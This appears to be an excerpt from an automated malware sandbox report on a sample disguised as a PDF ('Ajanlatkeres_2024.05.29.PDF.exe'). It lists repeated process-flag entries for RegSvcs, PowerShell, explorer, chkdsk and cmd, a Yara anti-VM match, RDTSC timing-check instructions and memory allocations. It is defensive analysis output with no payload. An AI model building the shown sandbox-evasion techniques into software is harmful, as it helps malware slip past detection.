Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\chkdsk.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match

File source: Process Memory Space: Ajanlatkeres_2024.05.29.PDF.exe PID: 2820, type: MEMORYSTR

Tries to detect virtualization through RDTSC time measurements

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	RDTSC instruction interceptor: First address: 409904 second address: 40990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	RDTSC instruction interceptor: First address: 409B7E second address: 409B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\chkdsk.exe	RDTSC instruction interceptor: First address: A39904 second address: A3990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\chkdsk.exe	RDTSC instruction interceptor: First address: A39B7E second address: A39B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exe	Memory allocated: 1330000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exe	Memory allocated: 2E90000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exe	Memory allocated: 1490000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exe	Memory allocated: 7C10000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exe	Memory allocated: 72A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exe	Memory allocated: 8D10000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exe	Memory allocated: 9D10000 memory reserve \| memory write watch	Jump to behavior
